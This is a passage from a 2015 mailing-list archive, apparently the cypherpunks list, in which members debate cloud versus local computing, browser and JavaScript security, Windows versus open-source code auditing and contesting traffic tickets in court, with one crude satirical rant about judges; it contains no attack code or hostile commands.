Jul 2015 10:52:00 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: <55A7EF40.5010401@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/16/2015 08:39 AM, Lodewijk andré de la porte wrote: > "All browsers suck"?.. They run HTML pretty darn well. I'd say HTML > is a document language, not an application language, and now it's > trying to http://lemire.me/blog/archives/2011/03/08/breaking-news-htmlcss-is-turing-complete/ http://beza1e1.tuxen.de/articles/accidentally_turing_complete.html > Not much wrong with JavaScript, but I hope they'll soon support > several http://cube-drone.com/comics/c/relentless-persistence Give it a little time; JavaScript bugs will become popular again. > But, pushing back, there's: * Latency/bandwidth to user * Loss of > end user's control over essential hardware * Massive trust and > security issues Easier to shut someone down with a single visit to the provider. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Yoiks! And awaaaaaay!" -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVp+87AAoJED1np1pUQ8Rk7psP/A3slCGxuPJmf+Ivv4gOGoVi W6pMTXwzyegewhnq8VlV4imL/QOifaz3LCXinwHDRPb/uz98K5IRd5dNTmDUT7lq d3PcoZryaQUU5mn8d0tGdaIzIJjKfgNVGkFMmiJaA0TfwHY2GHoA7K5r32Sol5Io 8uD0J7jVwqLeW/gx4KC5QRevVdZogr6T8dzYzwfKjiCiSbv6vMvVXzZH7EHP6eHW 1T9jWqO1uPd6+kuS310FU3aBCC7zFjOh/uTez++A45yK9EDz74wOxiEXVYaX8M2E 9cv+Qe9JNheqo4b4+2c5PLETMlBIB3DTGbwktlRP8FkTPoY5fwezopY+lX1MeUqG hPWICHkIycm6UM8wBIWe1Qqqa+Is7Nm/Vpo8gQi7nzS8D9C129x8RplGjGbXdzqW 5hdw2hO+9DX1ppfULKsc291V2tARPMt3ZELwM2jtixf9RAjgx7R++IFq+9o1zuYd uBj6i6m8wi/7k45D6XNv846GWiFb6APBW50LLvyAWwocsXSOhnbkj5fLicnXPRYF hfzIowKVaKP9zO2WaLYToz0vXhsqqRez0r1e6ULLy/XkryKQrei71Fr/67VkssN4 lRxCIru6nNoVjO3D8LxGYX3huWMzVMAFZIBpZYDrcr+konqbcSJ0z4fc4u4K7DYj gciwOKwkOK0S4UqAJHBj =vQwk -----END PGP SIGNATURE----- From drwho at virtadpt.net Thu Jul 16 10:52:37 2015 From: drwho at virtadpt.net (The Doctor) Date: Thu, 16 Jul 2015 10:52:37 -0700 Subject: an ominous comment In-Reply-To: <55A7E66A.9010403@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> Message-ID: <55A7EF65.4040806@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/16/2015 10:14 AM, Stephen D. Williams wrote: > Cypherpunks + Windows, what do you think? I'll take "Dirty secrets of the twenty-first century for two hundred, Alex." - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Yoiks! And awaaaaaay!" -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVp+9lAAoJED1np1pUQ8RkPAgP/0uLWjX0xcS7L5f70xurERde tskEBvU+qvBRsUFfL7YlkvfYOk10GtkXtR8VZkTKsRzOmWJ4/h8cbhoD3CPWI7yL q3dv/OhGXOaP888PBj/LSbrMtGlWAt69dWqN1ZLlHCZxrXTSXfqPjVGRy3qXUas0 qPWJDCy659NT/IkkS4Z1x7nldtIoLsxM99QGQy4fv6jNNuKjc/YQKmjoGyGKftDB hLQDZVco2/GK0fxQJp2fpFHAp+WSU+a1TtKu7LbZQ0FWsa6fqBYnSj2AzJliHyYn CXwVxhHvTCb+kahNqrpgZWn/TuMxr1RuxL8+Nmik4bGYSdWzWWgDu2+yMj9b12sF euofLSnEm31Bc/GDWqeAZo6xpgth6/UtHwOYMKJPa5A2mOwhoAE6vHRlMkEVk4bJ e9OuUs9JmgYC/nL7HriEteabFD/xWh3qtUqAdgG7JzRD5BiK2lqheS/YO/3mZMdv CKDIXV8eaAuoMuCo9uZNgDHlRGK/sJOF2vXed4QtGc93uh3PpT1qLATXS2yHtFZo Pq7H/KgKSgW5vfeB2TL7tRgIO038HFjAnlLuRqWVn4/L7jYZmpjjTctgglZz0pmk iUMtnSvcIfhBKaV8XGO8RNUwkELJDVlGxbi6XK22p2R76Xaox4n0jl0PM1Th9+eY ainzqOzz2VP9w/+HAyXe =E56C -----END PGP SIGNATURE----- From shelley at misanthropia.org Thu Jul 16 10:55:06 2015 From: shelley at misanthropia.org (Shelley) Date: Thu, 16 Jul 2015 10:55:06 -0700 Subject: an ominous comment In-Reply-To: <55A7E66A.9010403@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> Message-ID: <20150716175450.2ECC6680133@frontend2.nyi.internal> On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: > On 7/16/15 7:51 AM, Georgi Guninski wrote: > > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: > >> In a lot of ways, this is an elegant solution and could arguably be > >> much more secure than desktop apps in Windows. Assuming your > > Lol, is this positive or negative argument? > > > > it can hardly be less secure than windoze imho. > > Cypherpunks + Windows, what do you think? > > sdw > It's making me break out in hives, stop it! :p *shudder* From shelley at misanthropia.org Thu Jul 16 11:20:03 2015 From: shelley at misanthropia.org (Shelley) Date: Thu, 16 Jul 2015 11:20:03 -0700 Subject: an ominous comment In-Reply-To: <55A7EF40.5010401@virtadpt.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <55A7EF40.5010401@virtadpt.net> Message-ID: <20150716181947.85E896801A9@frontend2.nyi.internal> On July 16, 2015 11:00:31 AM The Doctor wrote: > http://cube-drone.com/comics/c/relentless-persistence Heh. There is a "share on facebutts" link :D When .space became available I bought a few domains, one being assbook.space. I was going to make it into an anti-social media forum, but the few times I've emailed someone from it it was marked as probable pr0n spam :D Ah, well... On topic: .js still sucks and so does the cloud. The End! -S From shelley at misanthropia.org Thu Jul 16 11:58:39 2015 From: shelley at misanthropia.org (Shelley) Date: Thu, 16 Jul 2015 11:58:39 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> Message-ID: <20150716185822.D75496801A9@frontend2.nyi.internal> On July 16, 2015 11:49:47 AM grarpamp wrote: > On Thu, Jul 16, 2015 at 1:55 PM, Shelley wrote: > > On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: > > > >> On 7/16/15 7:51 AM, Georgi Guninski wrote: > >> > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: > >> >> In a lot of ways, this is an elegant solution and could arguably be > >> >> much more secure than desktop apps in Windows. Assuming your > >> > Lol, is this positive or negative argument? > >> > > >> > it can hardly be less secure than windoze imho. > >> > > > >> Cypherpunks + Windows, what do you think? > > > > It's making me break out in hives, stop it! :p > > > > *shudder* > > The bazillion lines of effectively unaudited code in opensource > kernels and software should have the same effect upon you. It does; nothing is ever 100% safe, we must not become complacent. But FOSS : acne, Windoze (and Flash, Java, .js, etc) : ebola! -S From sdw at lig.net Thu Jul 16 12:33:55 2015 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 16 Jul 2015 12:33:55 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> Message-ID: <55A80723.5060405@lig.net> On 7/16/15 11:44 AM, grarpamp wrote: > On Thu, Jul 16, 2015 at 1:55 PM, Shelley wrote: >> On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: >> >>> On 7/16/15 7:51 AM, Georgi Guninski wrote: >>>> On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: >>>>> In a lot of ways, this is an elegant solution and could arguably be >>>>> much more secure than desktop apps in Windows. Assuming your >>>> Lol, is this positive or negative argument? >>>> >>>> it can hardly be less secure than windoze imho. >>> Cypherpunks + Windows, what do you think? >> It's making me break out in hives, stop it! :p >> >> *shudder* > The bazillion lines of effectively unaudited code in opensource > kernels and software should have the same effect upon you. I personally have audited quite a bit of FOSS (and enough spot checkers can get pretty good coverage), but not one line of proprietary Microsoft, Oracle, or Apple code. Your fears may be misplaced. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2102 bytes Desc: not available URL: From alan at clueserver.org Thu Jul 16 12:49:26 2015 From: alan at clueserver.org (alan at clueserver.org) Date: Thu, 16 Jul 2015 12:49:26 -0700 Subject: an ominous comment In-Reply-To: <55A80723.5060405@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> <55A80723.5060405@lig.net> Message-ID: <6d352c854bb75a56c719949fe6362459.squirrel@clueserver.org> > On 7/16/15 11:44 AM, grarpamp wrote: >> On Thu, Jul 16, 2015 at 1:55 PM, Shelley >> wrote: >>> On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: >>> >>>> On 7/16/15 7:51 AM, Georgi Guninski wrote: >>>>> On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: >>>>>> In a lot of ways, this is an elegant solution and could arguably be >>>>>> much more secure than desktop apps in Windows. Assuming your >>>>> Lol, is this positive or negative argument? >>>>> >>>>> it can hardly be less secure than windoze imho. >>>> Cypherpunks + Windows, what do you think? >>> It's making me break out in hives, stop it! :p >>> >>> *shudder* >> The bazillion lines of effectively unaudited code in opensource >> kernels and software should have the same effect upon you. > > I personally have audited quite a bit of FOSS (and enough spot checkers > can get pretty good coverage), but not one line of > proprietary Microsoft, Oracle, or Apple code. Your fears may be > misplaced. Large companies regularly scan their open source (and proprietary code) with Black Duck's ProtexIP software. That product shows if code is "borrowed" from other places. They also have open source tools that do similar things. The idea that open source is filled with stolen code is FUD. From grarpamp at gmail.com Thu Jul 16 11:44:10 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 16 Jul 2015 14:44:10 -0400 Subject: an ominous comment In-Reply-To: <20150716175450.2ECC6680133@frontend2.nyi.internal> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> Message-ID: On Thu, Jul 16, 2015 at 1:55 PM, Shelley wrote: > On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: > >> On 7/16/15 7:51 AM, Georgi Guninski wrote: >> > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: >> >> In a lot of ways, this is an elegant solution and could arguably be >> >> much more secure than desktop apps in Windows. Assuming your >> > Lol, is this positive or negative argument? >> > >> > it can hardly be less secure than windoze imho. >> > >> Cypherpunks + Windows, what do you think? > > It's making me break out in hives, stop it! :p > > *shudder* The bazillion lines of effectively unaudited code in opensource kernels and software should have the same effect upon you. From grarpamp at gmail.com Thu Jul 16 12:12:24 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 16 Jul 2015 15:12:24 -0400 Subject: an ominous comment In-Reply-To: <55A7E9B4.6030307@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> <55A7E9B4.6030307@lig.net> Message-ID: On Thu, Jul 16, 2015 at 1:28 PM, Stephen D. Williams wrote: > At some point > I realized that I should just go to court for every ticket or other > opportunity. If the alternative is that you certainly have to pay, then you > might as well learn, get comfortable protecting yourself in court, say your > peace, and try whatever legal argument you can think of. I have about a 50% > win rate. Few people realize how easy it is to push 50% on tickets even if all they do is plead not guilty and wait for the cop not to show up. And that's before feigning/posturing that you actually have a case thereby driving your own bargain. Prosecutors hate risk. You making a case in front of a judge is a risk they'll bend over backwards to avoid. Find their weak spots, play to win, go for the dismissals, prepare for the not guilty battles, punk the state, have fun with it :) After all, it is your right. And entire forums exist to help you do it. From grarpamp at gmail.com Thu Jul 16 12:29:47 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 16 Jul 2015 15:29:47 -0400 Subject: an ominous comment In-Reply-To: <55A7E73F.6070507@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <55A7E73F.6070507@lig.net> Message-ID: Trying to support cloud with argument of better tech is one thing. However tech doesn't really counter the arguments John makes. Echoing them... "Cloud" is every bit as much suspect in those various regards. Foisted upon ignorant IT management who bathe themselves in the cool-aid and false prospect of liability offloading. Pre positioned by IT job and education system requireing "certifications" funneling football jocks into IT instead of natural talent for sysadmin. Supported by rent seeking and constant churn of failed contracts into new contracts... locked up, tied down, paid to change and held hostage until freed. Insulated by mandatory contractual disclaimers to privacy, hacking and negligience. Perpetualized by the continual offering of dependency teat for suckage. Huge disjoint between interests. Your key to your door does not fit theirs. Extrafunded by datamining and exploited by all manner of "partners" on the backside. It's also interesting to see insurers popping up around IT risk. Yes, insurance can add needed diligence and rigor. But it also indicates an industry finally throwing its hands up and saying "Ok, we've hit the limit of reasonably attainable security". Good sysadmins/coders are worth their weight in gold. And even if only as advisors, you want them working directly for you, not on the other side of some cloud contract. Yes, the first "cloud" models were in fact an entire corporate HQ full of thin client xterms [today: browsers] connected to the datacenter down the hall. Analysts and admins might say that how [new] tech and resources are utilized is the factor, not where it's housed. Cloud is utilising and making good offers in particular use cases, because it's free to speculate on its own VC dime. But there are tangible caveats and risks there that don't always equate to a dire need to scrap what you already have down the hall. Look before you leap. From guninski at guninski.com Thu Jul 16 07:51:42 2015 From: guninski at guninski.com (Georgi Guninski) Date: Thu, 16 Jul 2015 17:51:42 +0300 Subject: an ominous comment In-Reply-To: <55A540A7.6080808@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: <20150716145142.GA2610@sivokote.iziade.m$> On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: > In a lot of ways, this is an elegant solution and could arguably be > much more secure than desktop apps in Windows. Assuming your Lol, is this positive or negative argument? it can hardly be less secure than windoze imho. From list at sysfu.com Thu Jul 16 19:21:00 2015 From: list at sysfu.com (Seth) Date: Thu, 16 Jul 2015 19:21:00 -0700 Subject: The Too Much Information Age Message-ID: http://abstrusegoose.com/553 -------------- next part -------------- A non-text attachment was scrubbed... Name: TMIA.png Type: image/png Size: 201214 bytes Desc: not available URL: From l at odewijk.nl Thu Jul 16 08:39:17 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Fri, 17 Jul 2015 00:39:17 +0900 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: 2015-07-15 2:20 GMT+09:00 Kurt Buff : > On Tue, Jul 14, 2015 at 10:02 AM, Stephen D. Williams wrote: > > Everything will be run in the cloud and browser because it is, overall, a > > better computation model. > > Certainly that's the current bias, but web browser as platform isn't > really all that it's cracked up to be, IMHO - all browsers suck, and I > don't see them getting better any time soon, especially if they run > javascript and plugins. > "All browsers suck"?.. They run HTML pretty darn well. I'd say HTML is a document language, not an application language, and now it's trying to be both and it's a pretty psychotic fit. But it still works pretty darn much better than anything else out there. I'd like there to be an "all settled standards compliant fast and secure browser", but the secure is usually omitted (and there's a rush to support the not-quite-settled standards). Not much wrong with JavaScript, but I hope they'll soon support several other languages too. Like perhaps LLVM's intermediary format - so we can compile whatever into a near-metal language that will run really fast. (and saving a lot of people the effort of writing/maintaining to-js compilers) But the cloud is a better computational platform because of: * Economies of scale for computer electronics, power, network connections * Time sharing on the cloud's hardware * Sometimes architecture advantages But, pushing back, there's: * Latency/bandwidth to user * Loss of end user's control over essential hardware * Massive trust and security issues We're looking at the following: - micropower devices; IoT and thinner smartphones (less power usage as batteries do not seem to develop fast), home automation panels, extra body-mounted-displays, in-car panels, home-appliance panels (refrigerator to mixer), televisions, alarm clocks, some tablets and laptops anything with power or financial constraints. These machines are that which the user interacts with. Their entire design gives way to human preference and comfort. They do not compute much, and might contain nothing but a video-stream-decoder and a "window manager" that decodes simple graphics statements (hopefully simpler than HTML). - computers; workstations, desktop pc's, laptops, stand-alone "videocards" with generic computing support, servers, gaming-appliances fast computers that are positioned somewhere in the house. Low latency to the user and with very good price/performance relationships (desktops now are miracles). Given the single-core-ceiling these machines will typically fare better than ideal cloud setups for many applications. They can be rented out to remote users dynamically. - remote processing; the cloud, the neighbors' computers, etc time-shared computing that is not in-house. Typically high latency, extremely high maximum power and lowest cost. Latency constraints force it to be used only for very expensive operations - such as rendering tasks and machine learning (for business intelligence or otherwise). If the set-up-time for such an operation is 2000ms many tasks are still better ran locally - the application-support-system (OS?) will have to make choices about this rather fast. > > However, that doesn't preclude you from running a > > cloud locally. > > Certainly better than public/commercial clouds - at least until proven > encryption becomes the norm. What I've described above is a sort of multi-tier architecture. At the moment remote or local computing is a wild west with exclusively homebrewed solutions. At some point we will integrate all our devices, and software's locality will be managed better as well. Encryption will be applied automatically at the appropriate places. I think the largest desired capability is the inaptly named "homomorphic encryption", which should be optimized and packaged such that heavy processing can be remotely executed in a safe and trustless manner. What is to be done? Well, I hope we can avoid the situation where we run the browsers and they run the software. We're going there now because the architecture I mentioned does not exist - and because it's a simpler model. A business could be made out of making hardware that follows the above model, that would probably be the best way to make it happen. Elsewise we're all along for the ride that the unknowing public is buying us into. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5594 bytes Desc: not available URL: From zen at freedbms.net Thu Jul 16 17:52:59 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Fri, 17 Jul 2015 00:52:59 +0000 Subject: an ominous comment In-Reply-To: <55A567F3.1000006@m-o-o-t.org> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <55A567F3.1000006@m-o-o-t.org> Message-ID: On 7/14/15, Peter Fairbrother wrote: > On 14/07/15 18:02, Stephen D. Williams wrote: >> Everything will be run in the cloud and browser because it is, overall, >> a better computation model. > > It is? Why? Why? You ask WHY!??!!! Pfft... pesky questions won't get you a short way... From zen at freedbms.net Thu Jul 16 17:59:19 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Fri, 17 Jul 2015 00:59:19 +0000 Subject: an ominous comment In-Reply-To: <20150716175450.2ECC6680133@frontend2.nyi.internal> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> Message-ID: On 7/16/15, Shelley wrote: > On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: > >> On 7/16/15 7:51 AM, Georgi Guninski wrote: >> > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: >> >> In a lot of ways, this is an elegant solution and could arguably be >> >> much more secure than desktop apps in Windows. Assuming your >> > Lol, is this positive or negative argument? >> > >> > it can hardly be less secure than windoze imho. >> > >> Cypherpunks + Windows, what do you think? >> >> sdw >> > > It's making me break out in hives, stop it! :p > > *shudder* Windows gives you wiiiings. From zen at freedbms.net Thu Jul 16 18:13:45 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Fri, 17 Jul 2015 01:13:45 +0000 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> <55A7E9B4.6030307@lig.net> Message-ID: On 7/16/15, grarpamp wrote: > On Thu, Jul 16, 2015 at 1:28 PM, Stephen D. Williams wrote: >> At some point >> I realized that I should just go to court for every ticket or other >> opportunity. If the alternative is that you certainly have to pay, then >> you >> might as well learn, get comfortable protecting yourself in court, say >> your >> peace, and try whatever legal argument you can think of. I have about a >> 50% >> win rate. > > Few people realize how easy it is to push 50% on tickets even if > all they do is plead not guilty and wait for the cop not to show up. > And that's before feigning/posturing that you actually have a case > thereby driving your own bargain. Prosecutors hate risk. > You making a case in front of a judge is a risk they'll bend over > backwards to avoid. Find their weak spots, play to win, go for the > dismissals, prepare for the not guilty battles, punk the state, > have fun with it :) After all, it is your right. And entire forums > exist to help you do it. One of the most significant benefits - learning to face one of your fears. Think you're tough, strong, emotionally balanced? Get up in front of a Magistrate and facing down the prosecutor, and see what your knees do then :) Do that a few times, and start to feel awesome! Self esteem fast track... From sdw at lig.net Fri Jul 17 07:21:57 2015 From: sdw at lig.net (Stephen D. Williams) Date: Fri, 17 Jul 2015 07:21:57 -0700 Subject: an ominous comment In-Reply-To: <6d352c854bb75a56c719949fe6362459.squirrel@clueserver.org> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> <55A80723.5060405@lig.net> <6d352c854bb75a56c719949fe6362459.squirrel@clueserver.org> Message-ID: <55A90F85.3040001@lig.net> On 7/16/15 12:49 PM, alan at clueserver.org wrote: >> On 7/16/15 11:44 AM, grarpamp wrote: >>> On Thu, Jul 16, 2015 at 1:55 PM, Shelley >>> wrote: >>>> On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: >>>> >>>>> On 7/16/15 7:51 AM, Georgi Guninski wrote: >>>>>> On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: >>>>>>> In a lot of ways, this is an elegant solution and could arguably be >>>>>>> much more secure than desktop apps in Windows. Assuming your >>>>>> Lol, is this positive or negative argument? >>>>>> >>>>>> it can hardly be less secure than windoze imho. >>>>> Cypherpunks + Windows, what do you think? >>>> It's making me break out in hives, stop it! :p >>>> >>>> *shudder* >>> The bazillion lines of effectively unaudited code in opensource >>> kernels and software should have the same effect upon you. >> I personally have audited quite a bit of FOSS (and enough spot checkers >> can get pretty good coverage), but not one line of >> proprietary Microsoft, Oracle, or Apple code. Your fears may be >> misplaced. > Large companies regularly scan their open source (and proprietary code) > with Black Duck's ProtexIP software. That product shows if code is > "borrowed" from other places. They also have open source tools that do > similar things. > > The idea that open source is filled with stolen code is FUD. > "Stolen code" isn't really an issue most of the time, but can be legally if a lot is used in a way that conflicts with a license. Reusing code snippets is, to a large extent, not really a copyright issue and often fair use or use of something that isn't really protected by copyright. In any case, it is a legal issue separate from the security implications. The FUD in question is whether there are security problems of some kind lurking in code, and whether it is easier to compromise a binary when you have source to start with. The flip side is that it is easier to hide back doors in code that has limited access to source code. Security mistakes, deliberate malware, and detection are possible in both cases, but in different ways, with different numbers of actual or potential people looking and with different likelihood of active positive or negative collusion. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3606 bytes Desc: not available URL: From sdw at lig.net Fri Jul 17 07:23:39 2015 From: sdw at lig.net (Stephen D. Williams) Date: Fri, 17 Jul 2015 07:23:39 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> <55A7E9B4.6030307@lig.net> Message-ID: <55A90FEB.4080204@lig.net> On 7/16/15 6:13 PM, Zenaan Harkness wrote: > On 7/16/15, grarpamp wrote: >> On Thu, Jul 16, 2015 at 1:28 PM, Stephen D. Williams wrote: >>> At some point >>> I realized that I should just go to court for every ticket or other >>> opportunity. If the alternative is that you certainly have to pay, then >>> you >>> might as well learn, get comfortable protecting yourself in court, say >>> your >>> peace, and try whatever legal argument you can think of. I have about a >>> 50% >>> win rate. >> Few people realize how easy it is to push 50% on tickets even if >> all they do is plead not guilty and wait for the cop not to show up. >> And that's before feigning/posturing that you actually have a case >> thereby driving your own bargain. Prosecutors hate risk. >> You making a case in front of a judge is a risk they'll bend over >> backwards to avoid. Find their weak spots, play to win, go for the >> dismissals, prepare for the not guilty battles, punk the state, >> have fun with it :) After all, it is your right. And entire forums >> exist to help you do it. > One of the most significant benefits - learning to face one of your > fears. Think you're tough, strong, emotionally balanced? Get up in > front of a Magistrate and facing down the prosecutor, and see what > your knees do then :) > > Do that a few times, and start to feel awesome! Self esteem fast track... Exactly. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2124 bytes Desc: not available URL: From jya at pipeline.com Fri Jul 17 08:28:27 2015 From: jya at pipeline.com (John Young) Date: Fri, 17 Jul 2015 11:28:27 -0400 Subject: an ominous comment In-Reply-To: <55A90FEB.4080204@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> <55A7E9B4.6030307@lig.net> <55A90FEB.4080204@lig.net> Message-ID: Exactly why judges masturbate with a noisy device, snooze, bark errant orders, abuse assistants, bailiffs, attorneys, juries, aggravate higher and lower judges, get shot, shoot back, get laid and STD in chambers. Courtroom tedium (aka justice), procedural churning, empty bombast, strutting, feigning, farting, fingering anus itch, jury boredom, hollow pretense of respect for the law -- from this comes little new, and a lot of wasted time, so obese, privileged, endlessly disputatious precedent is valued over disruptive lean novelty and Roy Bean quick resolution, wherein fear of mortality and hard labor are suspended self-sentences, and issuing death penalties against childhood bullies absconding with therapy dolls is the dream of payback jurists in black cross dresses. At 10:23 AM 7/17/2015, you wrote: >Exactly. > >sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1023 bytes Desc: not available URL: From guninski at guninski.com Fri Jul 17 07:55:35 2015 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 17 Jul 2015 17:55:35 +0300 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> Message-ID: <20150717145534.GA2514@sivokote.iziade.m$> On Fri, Jul 17, 2015 at 12:59:19AM +0000, Zenaan Harkness wrote: > On 7/16/15, Shelley wrote: > > > > It's making me break out in hives, stop it! :p > > > > *shudder* > > Windows gives you wiiiings. indeeeeeed, they caaaaaaan flyyyyyyy ;) From sdw at lig.net Sat Jul 18 10:22:38 2015 From: sdw at lig.net (Stephen D. Williams) Date: Sat, 18 Jul 2015 10:22:38 -0700 Subject: an ominous comment In-Reply-To: <20150718151551.GA2439@sivokote.iziade.m$> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> Message-ID: <55AA8B5E.1040202@lig.net> On 7/18/15 8:15 AM, Georgi Guninski wrote: > On Sat, Jul 18, 2015 at 01:39:45PM +0200, Florian Weimer wrote: >> Well, for one thing, it removes physical access to machines from >> insiders on your end, and in many cases, also direct access to data, >> particularly in its bulk form. >> >> With conscious effort and the right resources, you might be able to >> come with better security controls than the large service providers, >> but right now, most organizations don't have much of an audit trail >> for locally run services. I'm not sure if moving data off premises >> actually results in a net loss of control over it. Note be cause the >> service providers are so good at security, but because various factors >> conspire to make almost everyone else so bad. > Well, I don't trust the cloud and don't use it. > (I don't trust my boxen in a different way). > > The cloud owns the CPU and this is enough for me. > > You should be aware of the numerous virtualization > sploits -- Xen, Qemu, possibly others. > > Exploiting a virtualization bug is just the fee > "to be in cloud" and I _suspect_ more efforts > are needed for my boxen. Valid concerns in the abstract. In practice, the economic concerns of big cloud providers means they must provide continually upgraded certainty of fundamental security separation. Part of that is randomness of where your code runs: If there are millions of VMs on hundreds of thousands of physical servers, even if there is a VM escape, it is essentially impractical for malware to target your instance. This could be enhanced by VM / container hopping in various senses. Working within the system is likely to provide you a stronger result than something cobbled together locally. However, we need solutions for that too, with and without cloud technology. We need people who don't trust the cloud and keep developing better alternatives. I think some of those alternatives involve cloud technology locally, but that's not a big thing. I have friends who are rabid Google haters / fearmongers, apparently based on the fact that it was the first company they were aware of that seemed to have access and responsibility for too much information, or too much of their information, or too strong an allure for their information. I feel perfectly confident that Google is going to protect their billions in income and valuation by being very careful with avoiding abusing their data or users in any strong sense. That might not withstand a court order or national security letter or TLA hack monitoring unencrypted links, although big Silicon Valley companies recently have been getting tougher there. But it certainly means they aren't "reading my email" for prurient or invasive purposes that would be embarrassing to me: It would become embarrassing to them quickly and cost millions or billions. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3433 bytes Desc: not available URL: From edenw at gal3.com Sat Jul 18 10:55:52 2015 From: edenw at gal3.com (eden) Date: Sat, 18 Jul 2015 10:55:52 -0700 Subject: Encryption Rights - A Google+ community In-Reply-To: <179659091.PKgjI4HLZx@lapuntu> References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> <179659091.PKgjI4HLZx@lapuntu> Message-ID: On Sat, Jul 18, 2015 at 10:07 AM, rysiek wrote: > Dnia wtorek, 14 lipca 2015 02:45:39 Shelley pisze: >> On 